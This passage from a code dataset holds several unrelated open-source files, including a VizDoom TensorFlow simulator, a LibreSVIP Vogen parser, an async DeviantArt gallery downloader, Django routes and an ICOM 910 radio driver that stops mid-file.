.format(db=self.dbn))\n\n def execute(self, sql):\n \"\"\" Execute Command database - SQL \"\"\"\n if self.log:\n print(\"Command --> '{cmd}' \\n\".format(cmd=sql))\n self.cur.execute(sql)\n\n def commit(self):\n \"\"\" Execute Commit \"\"\"\n # commit the changes\n self.conn.commit()\n if self.log:\n print(\"Commit was succesful.\\n\")\n\n def close(self):\n \"\"\" Close connection and cursor of the PostgreSQL database server \"\"\"\n # close the communication with the PostgreSQL\n self.cur.close()\n self.conn.close()\n if self.log:\n print(\"\\nClose conn and cur of the PostgreSQL database...> '{db}' was succesfull.\"\n .format(db=self.dbn))\n\n#","repo_name":"marcobakos/courses","sub_path":"dbclass.py","file_name":"dbclass.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25432770619","text":"import tensorflow as tf\nimport numpy as np\nimport random, pickle, os\nfrom pathlib import Path\nfrom tqdm import trange\nfrom simulator_cfg import get_cfg\nfrom utils.vizdoom_api import VizDoom\nfrom utils.writer import Writer\n\n\n# Remove logs\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\ntf.logging.set_verbosity(tf.logging.ERROR)\n\ntf.enable_eager_execution()\ncfg = get_cfg()\n\nclass Simulator(object):\n\n def __init__(self):\n super(Simulator, self).__init__()\n \n self.model = cfg.model(cfg)\n self.optim = cfg.optim(cfg.learning_rate)\n self.loss = cfg.loss\n self.epoch = tf.Variable(0)\n\n self.writer = Writer(cfg)\n # Restore if save exists\n if Path('./simulator_saves/best').is_dir():\n self.model, self.optim, self.epoch = self.writer.restore(model=self.model, optim=self.optim, epoch=self.epoch)\n\n self.preprocessing()\n\n def preprocessing(self):\n if cfg.package_data or not Path('./data.pkl').is_file():\n vizdoom = VizDoom(cfg)\n memory = []\n for episode in trange(cfg.gather_epochs):\n vizdoom.new_episode()\n s0 = vizdoom.get_preprocessed_state()\n\n while not vizdoom.is_episode_finished():\n action = random.choice(cfg.actions)\n vizdoom.make_action(action)\n\n s1 = vizdoom.get_preprocessed_state()\n action = np.reshape(action, [1, 1, len(cfg.actions)]).astype(np.float32)\n\n memory.append([s0, action, s1])\n s0 = s1\n\n with open('data.pkl', 'wb') as f:\n pickle.dump(memory, f)\n\n # Load data\n with open(cfg.data_dir, 'rb') as f:\n s0, action, s1 = zip(*pickle.load(f))\n\n self.size = len(s0)\n self.data = tf.data.Dataset.from_tensor_slices((np.array(s0), np.array(action), np.array(s1)))\n\n def update(self, s0, action, s1):\n # Normalize\n s0_n = tf.image.per_image_standardization(s0)\n truth = tf.image.per_image_standardization(s1) - s0_n\n # Construct graph\n with tf.GradientTape() as tape:\n # Approximate next frame\n logits = self.model(s0_n, action)\n # Compare generated transformation matrix with truth\n loss = tf.reduce_mean(self.loss(truth, logits))\n\n # Log stats, images\n self.writer.log(self.optim, tape, loss)\n self.writer.log_state(\"logits\", logits)\n self.writer.log_state(\"truth_logits\", truth)\n # Compute/apply gradients\n grads = tape.gradient(loss, self.model.trainable_weights)\n grads_and_vars = zip(grads, self.model.trainable_weights)\n self.optim.apply_gradients(grads_and_vars)\n \n self.writer.global_step.assign_add(1)\n \n def train(self):\n for epoch in trange(self.epoch.numpy(), cfg.epochs):\n # Uniform shuffle\n batch = self.data.shuffle(self.size).batch(cfg.batch_size)\n for s0, action, s1 in batch:\n self.update(s0, action, s1)\n 
self.epoch.assign_add(1)\n self.writer.save(self.model, self.optim, self.epoch)\n\n def predict(self, s0, action):\n s0_n = tf.image.per_image_standardization(s0)\n logits = self.model(s0_n, action[None])\n return logits + s0_n\n\ndef main():\n model = Simulator()\n model.train()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"naomi-patterson/AlphaDoom","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35024877589","text":"import string, random\nimport math, typing\nimport matplotlib.pyplot as plt\nimport contextlib\nimport time\n#TODO: abstract base classes for documentation purposes later on\n#TODO: text graphing module\n#Burrows-Wheeler transform\n\ndef traverse(on=False):\n def outer(f):\n def wrapper(cls, v):\n if not on:\n return f(cls, v)\n _v = str(v) if isinstance(v, int) else v\n if not _v[1:]:\n return '{}{}'.format(cls.row[int(_v[0])][0], BlockTree.condense_rotations(str(cls.rotation)) if cls.rotation else '')\n _block = cls.row[int(_v[0])][-1]\n if _block:\n return _block[_v[1:]]\n return BlockTree(rotation = cls.rotation+1)[_v[1:]]\n\n return wrapper\n return outer\n\ndef testing_times(label = None):\n def outer(f):\n def wrapper(*args, **kwargs):\n _c = time.time()\n _result = f(*args, **kwargs)\n print(f\"{label}: action completed in method '{f.__name__}' in {time.time()-_c}\")\n return _result\n return wrapper\n return outer\n\nclass HashAlphabet:\n def __init__(self, max_depth = 6):\n self.max_depth = max_depth\n\n @testing_times(label='Random Generation')\n def __enter__(self) -> typing.List[str]:\n current = []\n for i in range(self.max_depth):\n while True:\n _row = self.__class__.random_row()\n if _row not in current:\n current.append(_row)\n break\n return current\n @staticmethod\n def random_row() -> str:\n _row = []\n for i in range(26):\n while True:\n _char = random.choice(string.ascii_lowercase)\n if _char not in _row:\n _row.append(_char)\n break\n return ''.join(_row)\n def __exit__(self, *args):\n pass\n\n @classmethod\n @testing_times(label='sigmoid curve')\n @contextlib.contextmanager\n def create_hashes(cls, in_full = False) -> typing.Generator[typing.Dict[int, str], None, None]:\n _r = [cls.scramble_alphabet(i) for i in range(1, 7)]\n if not in_full:\n yield _r\n else:\n yield [''.join(c[i] for i in range(26)) for c in _r]\n\n\n @classmethod\n def activate(cls, x, bounds=25, b=7, c=3, shift=0, reflect=False) -> int:\n if reflect:\n return -1*bounds/float(1+(b*pow(math.e, -1*c*(x-shift)))) + bounds\n return bounds/float(1+(b*pow(math.e, -1*c*(x-shift))))\n\n @classmethod\n def scramble_alphabet(cls, depth) -> typing.Dict[int, str]:\n b, c, shift = [0.1, 0.20156657963446475, 24]\n _result = {i:string.ascii_lowercase[int(cls.activate(i, b = b*depth, c = c, shift=shift))] for i in range(26)}\n missing = iter(i for i in string.ascii_lowercase if i not in _result.values())\n new_result = list(_result.items())\n return {a:b if not any(h == b and j != a for j, h in new_result[:i]) else next(missing, None) for i, (a, b) in enumerate(new_result)}\n\n @classmethod\n def increment_weights(cls, show_plot = False):\n def weights(d, current = []):\n if len(current) == 2:\n yield current\n else:\n for i in d:\n yield from weights(d, current+[i])\n\n _start = cls.scramble_alphabet()\n b_s = range(25*50)\n c_s = [random.randint(1*b, 100*(b+1))/float(random.randint(200*(i), 300*(2*i))) for b in range(1, 25) for i 
in range(1, 50)]\n weighted_tests = iter([i/float(10), b, c] for i in b_s for b in c_s for c in range(1, 25))\n last = []\n while abs(len(set(_start.values())) - len(list(_start.values()))) > 4:\n _w = next(weighted_tests, None)\n #print(_w)\n if not _w:\n return _start\n b, c, shift = _w\n last = [b, c, shift]\n _start = cls.scramble_alphabet(b = b, c = c, shift=shift)\n if show_plot:\n b, c, shift = last\n plt.plot(range(500), [cls.activate(i, b = b, c = c, shift = shift) for i in range(500)])\n plt.show()\n return _start, last\n\n\n\nwith HashAlphabet.create_hashes(True) as results1:\n pass\n\nwith HashAlphabet(6) as results2:\n pass\n\nclass BlockTree:\n combo_hashes = ['11111', '11110', '11101', '11100', '11011', '11010', '11001', '11000', '10111', '10110', '10101', '10100', '10011', '10010', '10001', '10000', '01111', '01110', '01101', '01100', '01011', '01010', '01001', '01000', '00111', '00110']\n def __init__(self, _start = 0, **kwargs):\n self.rotation = kwargs.get('rotation', 0)\n self.row = [[results2[kwargs.get('depth', 0)][i], BlockTree(i+1, depth = kwargs.get('depth', 0)+1, rotation=self.rotation) if i+1 < 26 and kwargs.get('depth', 0) < 5 else None] for i in range(_start, (_start+6)%26)]\n\n @traverse(on=False)\n def __getitem__(self, _val):\n return self.row[_val] if isinstance(_val, int) else dict(self.row)[_val]\n def __len__(self):\n return 1 if not any(c for _, c in self.row) else 1+max(map(len, [c for _, c in self.row]))\n\n def __bool__(self):\n return True\n\n @staticmethod\n def reverse_rotations(trailing):\n return int(''.join(i if i.isdigit() else str(string.ascii_lowercase.index(i)) for i in trailing))\n\n @staticmethod\n def combine_binary(_input):\n #print(_input)\n _start = [_input[0]]\n _full = []\n for i in _input[1:]:\n if i != _start[-1] or (len(_start)+1 > 5 and _start[-1] == '1'):\n if len(_start)+1 < 6 or _start[-1] != i:\n _full.append(_start)\n _start = [i]\n else:\n _full.append(_start)\n _full.append(['0'])\n _start = [i]\n else:\n _start.append(i)\n _full.append(_start)\n return ''.join(str(sum(map(int, i))) if i[0] == '1' else ''.join(i) for i in _full)\n\n\n def valid_lookups(self, letter, current = []):\n _start, *trailing = letter\n if current:\n #print(current)\n _to_check, *_trailing = self[BlockTree.combine_binary(''.join(current))]\n #print(_to_check)\n if not trailing:\n if current and _to_check == _start:\n yield current\n else:\n for option in BlockTree.combo_hashes:\n yield from self.valid_lookups(letter, current+[option])\n\n def lookup_path(self, letter, rotations=0):\n pass\n\n def __call__(self, hashed:str):\n _target, rotations = hashed[0], self.__class__.reverse_rotations(hashed[1:])\n\n @classmethod\n def visualize_layer(cls, block):\n return [[a, cls.visualize_layer(b) if b is not None else b] for a, b in block]\n\n @staticmethod\n def condense_rotations(_r:str):\n if len(_r) == 1:\n return _r\n _results = []\n while _r:\n if len(_r) == 1:\n return ''.join(_results+list(_r))\n a, b, *c = _r\n if int(a+b) < 26:\n _results.append(string.ascii_lowercase[int(a+b)])\n _r = c\n else:\n _results.append(a)\n _r = [b]+c\n return ''.join(_results)\n\n def __iter__(self):\n for i in self.row:\n yield i\n\n def __repr__(self):\n return f'<{self.__class__.__name__}: {\"|\".join([a for a, _ in self.row])}'\n\n\n\n#print(BlockTree.combine_binary('1111001001111111111'))\ndef combos(d, current = []):\n if len(current) == 5:\n yield ''.join(current)\n else:\n for i in d:\n yield from combos(d, current+[i])\n\n#print({i:[i, 
_t[BlockTree.combine_binary(i)]] for i in combos(['1', '0'])})\n#print(list(_t.valid_lookups('f')))\n#print(HashAlphabet.scramble_alphabet(2))\n'''\nwith HashAlphabet.create_hashes(True) as results:\n for i in results:\n print('-'*20)\n print(i)\nprint('\\n\\n')\nwith HashAlphabet(6) as results:\n for i in results:\n print(i)\n print('*'*20)\n'''\n_t = BlockTree()\nprint([_t[i] for i in range(6)])\n","repo_name":"Ajax12345/huffman_coding","sub_path":"scatter_tree1.py","file_name":"scatter_tree1.py","file_ext":"py","file_size_in_byte":8168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70666375555","text":"import pytest\n\nfrom app.store.telegram_api.te_view import ReplyKeyboard\n\n\n\nclass Test_ReplyKeyboard:\n bott_list = [\"дерево\", \"кустарник\", \"цветок\"]\n markup_json = {\n \"resize_keyboard\": True,\n \"selective\": False,\n \"one_time_keyboard\": True,\n \"keyboard\": [\n [\n {\n \"text\": \"дерево\",\n \"request_contact\": False,\n \"request_location\": False,\n },\n {\n \"text\": \"кустарник\",\n \"request_contact\": False,\n \"request_location\": False,\n },\n {\n \"text\": \"цветок\",\n \"request_contact\": False,\n \"request_location\": False,\n },\n ]\n ],\n }\n\n @pytest.mark.parametrize(\n \"bott_list, markup_json\",\n ((bott_list, markup_json),\n )\n )\n async def test_success(self, bott_list, markup_json):\n test_markup_json = await ReplyKeyboard.create(bott_list)\n assert test_markup_json == markup_json\n\n\n\nclass Test_Webhook_handling:\n request = None\n answer = None\n\n @pytest.mark.parametrize(\n \"request, answer\",\n ((request, answer),\n ))\n async def test_success(self, request, answer):\n pass\n\n","repo_name":"mobiden/telegram_bot","sub_path":"tests/telegram_api_tests/test_t_api_views.py","file_name":"test_t_api_views.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36868132778","text":"def msg(text, cor=\"\"):\n print(f\"\\033[{cor}m\"+\"=\"*(len(text)+4))\n print(text.center(len(text)+4))\n print(\"=\"*(len(text)+4)+\"\\033[m\")\n\ndef horizontal_line(len=10):\n print(\"=\"*len)\n\ndef verify_int(value, accepted):\n try:\n if int(value) in accepted:\n return int(value)\n else:\n raise TypeError\n except:\n while True:\n try:\n value = int(input(\"\\033[31mPlease insert a valid value: \\033[m\"))\n if value in accepted:\n return int(value)\n break\n except:\n pass\n\ndef verify_yes_no(resp):\n if resp.upper() in \"YN\" and resp != \"\":\n return resp.upper()\n else:\n while True:\n resp = input(\"\\033[31mPlease insert a valid response [Y/N]: \\033[m\")\n if resp.upper() in \"YN\" and resp != \"\":\n return resp.upper()\n break\n\ndef menu(title, *options):\n count = 1\n for option in options:\n print(f\"\\033[34m{count}\\033[m - \\033[33m{option}\\033[m\")\n count +=1\n print()\n resp = verify_int(input(\"Please choose an option: \"), range(1, count+1))\n return resp\n\ndef confirm_question(question):\n print(\"\\n\\033[31mAre these informations correct?\\n\\033[m\")\n print(\"\\033[34m\" + question[\"question\"] + \"\\033[34m\")\n print(\"\\033[33m\")\n print(\"A) \" + question[\"A\"])\n print(\"B) \" + question[\"B\"])\n print(\"C) \" + question[\"C\"])\n print(\"D) \" + question[\"D\"])\n print(\"E) \" + question[\"E\"])\n print(\"\\033[m\")\n\n resp = verify_yes_no(input(\"Are you sure? 
\"))\n return resp\n","repo_name":"Thiagomrfs/IMOQ-Manager","sub_path":"support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"28908586866","text":"import dataclasses\n\nfrom libresvip.model.base import (\n Note,\n Project,\n SingingTrack,\n SongTempo,\n TimeSignature,\n)\n\nfrom .model import (\n VogenNote,\n VogenProject,\n VogenTrack,\n)\nfrom .options import InputOptions\n\n\n@dataclasses.dataclass\nclass VogenParser:\n options: InputOptions\n\n def parse_project(self, vogen_project: VogenProject) -> Project:\n return Project(\n song_tempo_list=self.parse_tempos(vogen_project.bpm0),\n time_signature_list=self.parse_time_signatures(vogen_project.time_sig0),\n track_list=self.parse_tracks(vogen_project.utts),\n )\n\n def parse_tempos(self, bpm0: float) -> list[SongTempo]:\n return [SongTempo(position=0, bpm=bpm0)]\n\n def parse_time_signatures(self, time_sig0: str) -> list[TimeSignature]:\n numerator, _, denominator = time_sig0.partition(\"/\")\n return [TimeSignature(numerator=int(numerator), denominator=int(denominator))]\n\n def parse_tracks(self, utts: list[VogenTrack]) -> list[SingingTrack]:\n return [\n SingingTrack(\n title=utt.name,\n ai_singer_name=utt.singer_id,\n note_list=self.parse_notes(utt.notes),\n )\n for utt in utts\n ]\n\n def parse_notes(self, notes: list[VogenNote]) -> list[Note]:\n return [\n Note(\n start_pos=note.on,\n length=note.dur,\n lyric=note.lyric,\n pronunciation=note.rom,\n key_number=note.pitch,\n )\n for note in notes\n ]\n","repo_name":"SoulMelody/LibreSVIP","sub_path":"libresvip/plugins/vog/vogen_parser.py","file_name":"vogen_parser.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"2070709723","text":"import os\nimport sys\nimport time\nimport asyncio\nimport aiohttp\nimport aiofiles\n\n\nAPI_URL = \"https://www.deviantart.com/_napi/da-user-profile/api/gallery/contents\"\n\n\nasync def download_img(session, title, url):\n url = \"https://backend.deviantart.com/oembed?url=\" + url\n\n async with session.get(url) as response:\n if response.ok:\n json = await response.json()\n \n async with session.get(json[\"url\"]) as response:\n if response.ok:\n async with aiofiles.open(title, mode='wb') as file:\n await file.write(await response.read())\n\n\nasync def request_next_bunch(session, params):\n tasks = []\n async with session.get(API_URL, params=params) as response:\n if response.ok:\n json = await response.json()\n \n for index, img in enumerate(json[\"results\"]):\n title, url = str(params[\"offset\"] + index) + \".jpg\", img[\"deviation\"][\"url\"]\n tasks.append(asyncio.create_task(download_img(session, title, url)))\n\n params[\"offset\"] = json[\"nextOffset\"] \n \n await asyncio.gather(*tasks)\n\n\nasync def main(account):\n params = {\n \"username\": account,\n \"offset\": 0,\n \"limit\": 20\n }\n\n async with aiohttp.ClientSession() as session:\n while params[\"offset\"] is not None:\n await request_next_bunch(session, params)\n","repo_name":"Abullity/Async-DeviantArt-Image-Scraper","sub_path":"run_async.py","file_name":"run_async.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22040914707","text":"from django.conf.urls import include, url\nfrom . 
import views\n\nurlpatterns = [\n url(r'^pessoa-juridica$', views.listar_clientesPJ, name='listar_clientesPJ'),\n url(r'^pessoa-juridica/novo/$', views.novo_clientePJ, name='novo_clientePJ'),\n url(r'^pessoa-juridica/editar/(?P<pk>\d+)/$',\n views.editar_clientePJ, name='editar_clientePJ'),\n url(r'^pessoa-juridica/excluir/(?P<pk>\d+)/$',\n views.excluir_clientePJ, name='excluir_clientePJ'),\n url(r'^pessoa-fisica$', views.listar_clientesPF, name='listar_clientesPF'),\n url(r'^pessoa-fisica/novo/$', views.novo_clientePF, name='novo_clientePF'),\n url(r'^pessoa-fisica/editar/(?P<pk>\d+)/$',\n views.editar_clientePF, name='editar_clientePF'),\n url(r'^pessoa-fisica/excluir/(?P<pk>\d+)/$',\n views.excluir_clientePF, name='excluir_clientePF'),\n]\n","repo_name":"luzfcb/bcrsilva","sub_path":"bcrsilva/cliente/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72520705795","text":"# me - this DAT\n# scriptOp - the OP which is cooking\n#\n# press 'Setup Parameters' in the OP to call this function to re-create the parameters.\nimport struct\n\ndef setupParameters(scriptOp):\n page = scriptOp.appendCustomPage('Custom')\n p = page.appendPulse('Change')\n return\n\n# called whenever custom pulse parameter is pushed\ndef onPulse(par):\n return\n\ndef cook(scriptOp):\n scriptOp.clear()\n scriptOp.appendRow(['pos', 'r', 'g', 'b', 'a'])\n inDat = scriptOp.inputs[0]\n\n colorCount = len(inDat.rows()) - 1\n for idx, r in enumerate(inDat.rows()):\n color = r[0].val\n if r[0].val[0] == '#':\n color = color[1:]\n cs = list(map(lambda x: x / 256, struct.unpack('BBB',bytes.fromhex(color))))\n cs.insert(0, idx / colorCount)\n cs.append(1)\n scriptOp.appendRow(cs)\n return\n","repo_name":"ulyssesdotcodes/oscillare","sub_path":"TD/scripts/Visuals/palette_mapper.py","file_name":"palette_mapper.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"} +{"seq_id":"19563699090","text":"#!/usr/bin/python3\n\n\"\"\"\nImplementation of a hash table in python using list and tuples.\nThe keys are accepted as integers and the values can\nbe passed as any data type.\n\"\"\"\n\nlength = 10\n\nhash_table = [None]*10\nprint(hash_table)\n\ndata_to_be_inserted = { \n 2 : 'a', \n 3 : 'c', \n 13 : 'd', \n 10 : 'r', \n 12 : 'x', \n 7 : 'u', \n 18 : 'p', \n 0 : 'n' \n}\n\ndef hash_function(key):\n return key % 10 \n\ndef insert(key, value):\n pos = hash_function(key)\n if hash_table[pos]:\n hash_table[pos].append(( key, value ))\n else:\n hash_table[pos] = [( key, value )]\n\ndef create_table():\n cont = True \n while cont:\n key = int(input(\"type key which is an integer \"))\n value = input(\"type value \")\n insert(key, value)\n cont = bool(input(\"continue? type y/n \") == 'y')\n if not cont:\n break\n \ncreate_table()\n\nprint(hash_table)\n","repo_name":"himan2ds/data_structures_with_python","sub_path":"hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27510109663","text":"\"\"\" \nWrite a function, token_replace, that takes in a dictionary of tokens and a string. The function \nshould return a new string where tokens are replaced.\n\nTokens are enclosed in a pair of '$'. You can assume that the input string is properly formatted. 
\nTokens should be replaced from left to right in the string (see test_05).\n\"\"\"\n\ndef token_replace(s, token):\n \n for word, value in token.items():\n s = s.replace(word, value)\n\n return s \n\n# Driver code\n# Test case 01\n\ntokens = {\n '$LOCATION$': 'park',\n '$ANIMAL$': 'dog',\n}\nprint(token_replace('Walk the $ANIMAL$ in the $LOCATION$!', tokens))\n# -> 'Walk the dog in the park!'\n\n# Test case 02\ntokens = {\n '$ADJECTIVE$': 'quick',\n '$VERB$': 'hopped',\n '$DIRECTION$': 'North'\n}\nprint(token_replace('the $ADJECTIVE$ fox $VERB$ $ADJECTIVE$ly $DIRECTION$ward', tokens))\n# -> 'the quick fox hopped quickly Northward'\n\n# Test case 03 \ntokens = {\n '$greeting$': 'hey programmer',\n}\nprint(token_replace('his greeting is always $greeting$.', tokens))\n# -> 'his greeting is always hey programmer.'","repo_name":"monika0603/glowing-spork","sub_path":"mixed_recall/token_replace.py","file_name":"token_replace.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4783935318","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('assocr', '0002_uf'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='uf',\n name='typequote',\n field=models.CharField(default=1, max_length=20),\n preserve_default=True,\n ),\n ]\n","repo_name":"erueloi/Assocr","sub_path":"assocr/migrations/0003_auto_20150227_1307.py","file_name":"0003_auto_20150227_1307.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33196194","text":"\"\"\" @package hwm.hardware.devices.drivers.icom_910.icom_910\nThis module contains a hardware driver and command handler for the ICOM 910 radio.\n\"\"\"\n\n# Import required modules\nimport logging, time\nimport Hamlib\nfrom twisted.internet import task, defer\nfrom twisted.internet.defer import inlineCallbacks\nfrom hwm.core.configuration import *\nfrom hwm.hardware.pipelines import pipeline\nfrom hwm.hardware.devices.drivers import driver\nfrom hwm.command import command\nfrom hwm.command.handlers import handler\n\nclass ICOM_910(driver.HardwareDriver):\n \"\"\" A driver for the ICOM 910 radio.\n\n This class provides a hardware driver for the ICOM 910 series of radios. It is primarily responsible for controlling \n the radio and automatically correcting its frequency for doppler shifts. In addition, it provides a command handler \n capable of controlling the ICOM 910.\n\n @note This driver requires that Hamlib2 be installed and configured, including the Python bindings.\n @note This driver is not currently capable of sending or receiving data to or from the radio directly. It is designed \n for pipelines that also contain a TNC, which will serve as the pipeline's input and output device.\n @note This driver is currently setup to operate in half-duplex mode. In half-duplex mode, only the MAIN VFO is set and\n the uplink frequency is specified via a split frequency.\n @note The ICOM 910 driver will work with the TNC driver to make sure that it doesn't change its frequency when the \n TNC is receiving data. 
This will prevent the ICOM from entering an undefined state.\n \"\"\"\n\n def __init__(self, device_configuration, command_parser):\n \"\"\" Sets up the ICOM 910h driver.\n\n @param device_configuration A dictionary containing the radios's configuration options.\n @param command_parser A reference to the active CommandParser instance. The driver will use this to\n automatically update the RX and TX frequencies as needed.\n \"\"\"\n\n super(ICOM_910,self).__init__(device_configuration, command_parser)\n\n # Set configuration settings\n self.icom_device_path = device_configuration['icom_device_path']\n self.doppler_update_frequency = device_configuration['doppler_update_frequency'] # s\n self.doppler_update_inactive_tx_delay = device_configuration['doppler_update_inactive_tx_delay'] # s\n\n # Initialize the driver's command handler\n self._command_handler = ICOM910Handler(self)\n\n self._reset_driver_state()\n\n def prepare_for_session(self, session_pipeline):\n \"\"\" Prepares the radio for use by a new session by loading the necessary services and setting up Hamlib.\n\n @note This method loads the active 'tracker' service from the session pipeline. The driver will use this service to \n load the doppler shift multiplier for the active target. If a 'tracker' service can not be loaded, no doppler\n correction will be applied.\n @note This method loads the active 'tnc_state' service from the session pipeline. The driver will use this service \n to make sure that it does not allow its uplink frequency to be changed if data is being transmitted. If this \n service can't be located, no such protection will be provided (possibly putting the radio into an undefined \n state).\n\n @param session_pipeline The Pipeline associated with the new session.\n @return Returns True once the radio is ready for use by the session.\n \"\"\"\n\n self._reset_driver_state()\n\n # Load the 'tracker' service\n self._session_pipeline = session_pipeline\n try:\n self._tracker_service = session_pipeline.load_service(\"tracker\")\n self._tracker_service.register_position_receiver(self.process_new_doppler_correction)\n except pipeline.ServiceTypeNotFound as e:\n # A tracker service isn't available\n logging.error(\"The \"+self.id+\" driver could not load a 'tracker' service from the session's pipeline.\")\n\n # Load the 'tnc_state' service\n try:\n self._tnc_state_service = session_pipeline.load_service(\"tnc_state\")\n except pipeline.ServiceTypeNotFound as e:\n # A tnc_state service isn't available\n logging.error(\"The \"+self.id+\" driver could not load a 'tnc_state' service from the session's pipeline.\")\n\n # Create a Hamlib rig for the radio\n Hamlib.rig_set_debug(Hamlib.RIG_DEBUG_NONE)\n self._command_handler.radio_rig = Hamlib.Rig(Hamlib.RIG_MODEL_IC910)\n self._command_handler.radio_rig.set_conf(\"rig_pathname\",self.icom_device_path)\n self._command_handler.radio_rig.set_conf(\"retry\",\"5\")\n self._command_handler.radio_rig.open()\n\n return True\n\n def cleanup_after_session(self):\n \"\"\" Resets the radio to its idle state after the session using it has ended.\n \"\"\"\n\n # Reset the device\n self._command_handler.radio_rig.close()\n self._command_handler.radio_rig = None\n self._reset_driver_state()\n\n return\n\n def get_state(self):\n \"\"\" Provides a dictionary that contains the current state of the radio.\n\n @return Returns a dictionary containing select elements of radio state.\n \"\"\"\n\n return self._radio_state\n\n @inlineCallbacks\n def process_new_doppler_correction(self, 
target_position):\n \"\"\" Notifies the radio driver that new doppler correction information is available.\n\n This inline callback receives new target position information (including the doppler correction) from a 'tracker' \n service. The driver will use this information to periodically (as defined in the configuration) update the uplink \n and downlink frequencies on the radio.\n\n @note If the active tracker service doesn't provide a doppler correction, this method will not update the radio's\n frequency.\n @note Because this method uses the set_uplink_freq command, it will only update the uplink frequency if the radio is\n not currently transmitting (as determined by the pipeline's tnc_state service). If the TNC is receiving data \n when the command is received, it will be ignored.\n\n @param target_position A dictionary containing details about the target's position, including its doppler \n correction.\n @return Returns True after updating both the uplink and downlink frequencies or False if an error occurs.\n \"\"\"\n\n # Verify the target position\n if 'doppler_multiplier' not in target_position:\n logging.error(\"The target position provided to the '\"+self.id+\"' driver did not contain a doppler correction multiplier.\")\n yield defer.returnValue(False)\n\n # Make sure it's been long enough since the last update\n if (int(time.time()) - self._last_doppler_update) > self.doppler_update_frequency:\n downlink_freq_set = False\n uplink_freq_set = False\n\n # Send the command to update the downlink frequency\n new_downlink_freq = target_position['doppler_multiplier'] * self._radio_state['set_rx_freq']\n command_request = {\n 'command': \"set_rx_freq\",\n 'destination': self._session_pipeline.id+\".\"+self.id,\n 'parameters': {\n 'frequency': new_downlink_freq\n }\n }\n command_deferred = self._command_parser.parse_command(command_request, \n user_id = self._session_pipeline.current_session.user_id)\n results = yield command_deferred\n\n # Send the command to update the uplink frequency\n if results['response']['status'] != 'error':\n downlink_freq_set = True\n new_uplink_freq = target_position['doppler_multiplier'] * self._radio_state['set_tx_freq']\n command_request = {\n 'command': \"set_tx_freq\",\n 'destination': self._session_pipeline.id+\".\"+self.id,\n 'parameters': {\n 'frequency': new_uplink_freq\n }\n }\n command_deferred = self._command_parser.parse_command(command_request, \n user_id = self._session_pipeline.current_session.user_id)\n results = yield command_deferred\n\n # Verify the results\n if results['response']['status'] != 'error':\n uplink_freq_set = True\n\n if uplink_freq_set and downlink_freq_set:\n self._last_doppler_update = time.time()\n yield defer.returnValue(True)\n else:\n logging.error(\"The '\"+self.id+\"' driver did not update its doppler correction because one or both of the \"+\n \"'set_rx_freq' and 'set_tx_freq' commands failed.\")\n yield defer.returnValue(False)\n\n def _reset_driver_state(self):\n \"\"\" Resets the radio driver's state.\n \"\"\"\n\n # Set the driver's attributes\n self._tracker_service = None\n self._tnc_state_service = None\n self._session_pipeline = None\n self._last_doppler_update = 0\n self._radio_state = {\n \"set_tx_freq\": 0.0,\n \"set_rx_freq\": 0.0,\n \"shifted_tx_freq\": 0.0,\n \"shifted_rx_freq\": 0.0,\n \"mode\": None\n }\n\nclass ICOM910Handler(handler.DeviceCommandHandler):\n \"\"\" A command handler that handles basic commands for the ICOM 910 series of radios.\n\n @note Most of the commands in this 
handler require that Hamlib be installed with the Python bindings.\n \"\"\"\n\n def __init__(self, driver):\n \"\"\" Sets up the ICOM 910 command handler.\n\n @param driver The Driver instance that offers this command handler.\n \"\"\"\n\n super(ICOM910Handler,self).__init__(driver)\n\n # Set handler state\n self.radio_rig = None\n\n def command_set_mode(self, active_command):\n \"\"\" Sets the radio's mode and updates the driver's state appropriately.\n \n @note Currently, this command can only set the mode to: \"FM\"\n\n @throws Raises CommandError if the command fails for some reason.\n\n @param active_command The executing Command. Contains the command parameters.\n @return Returns a dictionary containing the command response.\n \"\"\"\n\n if self.radio_rig is not None:\n if 'mode' in active_command.parameters:\n # Set the mode in Hamlib\n new_mode = active_command.parameters['mode']\n if new_mode == \"FM\":\n response = self.radio_rig.set_mode(Hamlib.RIG_MODE_FM)\n else:\n raise command.CommandError(\"An unrecognized mode was specified.\")\n\n # Check for errors\n if response != Hamlib.RIG_OK:\n raise command.CommandError(\"An error occurred setting the radio's mode.\")\n\n # Get the mode and update the driver state\n mode, width = self.radio_rig.get_mode()\n self.driver._radio_state['mode'] = Hamlib.rig_strrmode(mode)\n\n return {'message': \"The radio mode has been set.\", 'mode': new_mode}\n else:\n raise command.CommandError(\"No mode specified for the 'set_mode' 